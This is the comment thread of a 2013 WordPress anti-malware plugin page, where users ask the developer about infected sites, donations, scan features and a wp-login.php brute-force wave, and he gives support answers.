    • On May 3, 2013 at 5:30 pm, Anti-Malware Admin said:

      Thanks for sending me your login. I found and removed the iframes from the header and footer of your theme and your site is clean now. I also added this new variant to my definition updates so it can be automatically removed in the future.

      Reply
  • On April 29, 2013 at 7:27 am, agadir aeroport said:

    Hi Eli,
    In loving with ur plugin, i’d like if possible it detect the iframes in or out the HTML tag, like this :

    thanks a lot

    Reply
    • On April 29, 2013 at 7:49 am, Anti-Malware Admin said:

      The iframe example you tried to post did not come through. If you want to send me your WP Admin credentials I will login and find that malicious iframe for you and add it to me definition update so that it can be automatically removed.

      Reply
  • On April 26, 2013 at 4:36 pm, Wayne Dibble said:

    HI,
    As soon as I registered the plugin to download the latest threats my site is off line? Forced to deactivate to get my site back up – whats the issue, does anybody know?
    Wayne…

    Reply
    • On April 26, 2013 at 5:32 pm, Anti-Malware Admin said:

      I would like to help you troubleshoot this issue. These are strange symptoms you are describing. Can you confirm that your site goes off-line just by having my plugin enabled?

      Could you please also tell me what you see when your site is “off-line” (error message, blank white page, etc.)?

      Reply
  • On April 26, 2013 at 3:58 am, Michele said:

    hi and thank you for your plugin.

    I was wondering if you could give us a roadmap to the possibility to schedule an automatic-scan function. I read you are planning to add it in a future version?

    I would be more than happy to make a donation or pay for a “pro” version in order to have such a function in anti-malware.

    Thanks!

    Michele From Italy

    Reply
    • On April 26, 2013 at 7:18 am, Anti-Malware Admin said:

      Thanks for your interest. This feature is in the design stages now. There is one major update slated for next month, which is Automated Updates to the Definition. Then I will start testing the implementation of Scheduled Scans :D

      It’s just me on this project and I donate my to making it better and helping people with infections. Donations to me help me justify the time I spend making this plugin better, so fee free to donate ;-)

      I don’t think I’ll ever charge a fixed fee for this plugin, it has helped many people around the world that cannot pay, and I could never cut them off just because they don’t have the means to pay. I know this leaves the door open for a lot of people who could pay to not pay … but that’s their karma :P

      Reply
  • On April 23, 2013 at 4:55 am, RJ said:

    I made a donation so I could use your repair function, but I’m not sure how to make it repair the malware it found. It still keeps asking for a donation.

    Please help!

    Thanks,

    RJ

    Reply
    • On April 23, 2013 at 6:50 am, Anti-Malware Admin said:

      I got your donation, Thank you! It should reflect your donation amount in the sidebar and not pester you to donate any more (of course you’re always welcome to donate more whenever you want to ;-)

      Reply
  • On April 23, 2013 at 12:15 am, Johnathan Hurwitz said:

    I like this plug in. Is there a way to see what your auto fix actually changed so we can learn what to look for.

    I was getting hit by these and my comments are set to members only. Your system found one issue in the WP-Login.PhP is that how such fools were able to comment on my site without actually joining. Have no posts with such garbage only a few comments.

    louis vuitton bags sale (IP: 223.246.175.120 , 223.246.175.120)
    retro jordans (IP: 123.156.198.240 , 123.156.198.240)

    bEavWIHB (IP: 113.231.232.108 , 113.231.232.108)

    Thanks for your help

    Reply
    • On April 24, 2013 at 2:22 pm, Anti-Malware Admin said:

      Sorry for not replying right away. I have been swampted with this new wp-login.php vulnerability that has resently been exploited by a wide-spread brute-force attack. I have just finished fine-tuning my security patch for the WordPress login file and I am just now able to breath again and catch up on the regular stuff.

      If you click on the linked filename for any file that has been found to contain threats, you can see the contents of that file with a list of links at the top for each match found in that file. clicking on those links at the top will usually highlight the malicious/suspicious code.

      After you run the Automatic Repair you can click the linked file again and, if the file still exists, you will see the new contents (which should not have any malicious code).

      FYI – Comments are stored in the database and not yet scanned by this file scanner. You should look into comment security/spam plugins and maybe tighter database security to prevent this kind of thing.

      Reply
      • On April 24, 2013 at 2:54 pm, Johnathan Hurwitz said:

        Thanks for the reply. I understand your hard effort the wp-login.php has come up twice for me. I’m relatively new to WP and when I found comments with spam even though there was no new member I was really surprised

        I also learned when one is spammed in WP you need to move the file to the spam folder so the anti spam will learn and then block. I was deleting them all together and banning the IP of which is a near useless process. I have two spam plugins now, one for comments and the other for registrations.

        Keep up the great work and this attack is indeed an interesting one.

        Reply
  • On April 22, 2013 at 12:40 pm, debbie marconi said:

    Just spent the last half hour reading your comments Eli. You are heaven sent and plan to be a regular donor as well. Maybe sometime you can also look into the guts of my blog and see if we have all of our bases covered. Thanks again!

    Reply
  • On April 22, 2013 at 9:14 am, debbie marconi said:

    After running the scan, two of my files were quarantined and now I cannot log back into my site. I need help….NOW! I cannot find any place to contact you on this site other than here. Did I donate to a legit business?

    Reply
    • On April 22, 2013 at 12:25 pm, debbie marconi said:

      I had my problem resolved by Eli and in a most professional and timely manner! At this point, I highly recommend this plug-in. I wish Eli lived next door but he actually handled this problem like he was a neighbor already. Thanks Eli, you rock!

      Reply
  • On April 19, 2013 at 1:37 pm, Christy said:

    Hi! Thank you so much for your plugin! My site was recently hacked with malware. It seems that only Chrome is blocking access to my website. I tried to run the scan a few times, and it did not find anything. There was a long list of suspicious files, but I have no idea how to go about checking them. With the most recent update, I was able to find and delete a Login Exploit, but I’m not sure if that removed the malware.

    I’m also getting this message “Another Plugin or Theme is using ‘wpfbogp_callback’ to hadle output buffers.
    This prevents actively outputing the buffer on-the-fly and will severely degrade the performance of this (and many other) Plugins.
    Consider disabling caching and compression plugins (at least during the scanning process).” and I’m not sure which plugins are interfering.

    Is there any way you can help? It would be much appreciated, and I’d be happy to donate to your plugin. Thank you!

    Reply
    • On April 19, 2013 at 2:21 pm, Anti-Malware Admin said:

      You can find out why Google has blocked your site in the Health section of your Google Webmaster Tools account.
      You can also request a review there to clear that warning if the site is now clean.

      If you want me to check your site first and make sure it’s clean, I will need you to send me your WP Admin login. I can also check that wpfbogp_callback to see what plugin is doing that and why.

      Reply
    • On April 25, 2013 at 9:09 am, Anti-Malware Admin said:

      Are you still getting a warning in Chrome?

      I was able to run a Complete Scan and found that wpfbogp_callback in the wp-facebook-open-graph-protocol plugin. That is why the Quick Scan is not running so well.

      I don’t see any malware and Google says you’re clean too so maybe it’s just your browser cache.

      Reply
      • On April 25, 2013 at 9:50 am, Christy said:

        Thank you so much for your help, Eli. I’m not getting the warnings anymore, but I’ll have to check if other people still are. I’ll just assure my Facebook fans that my site is clean.

        Thank you,
        Christy

        Reply
  • On April 5, 2013 at 9:52 am, Jeff Rafael said:

    I ran the full scan after registering (I had not donated yet), it identified several threats and I clicked to repair… It said all was clean, but I checked with webmaster tools and it said I was still infected. What do I do now? Feel free to contact me to discuss further. thanks!

    Reply
    • On April 5, 2013 at 10:02 am, Anti-Malware Admin said:

      Did you request a review in Webmaster Tools?

      If Google still says you are infected after a review then what are the details of the infection?

      If you need more direct help you can email me your WP Admin login and I’ll look into it.

      Reply

Leave a Reply

Your email address will not be published. Required fields are marked *

*

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>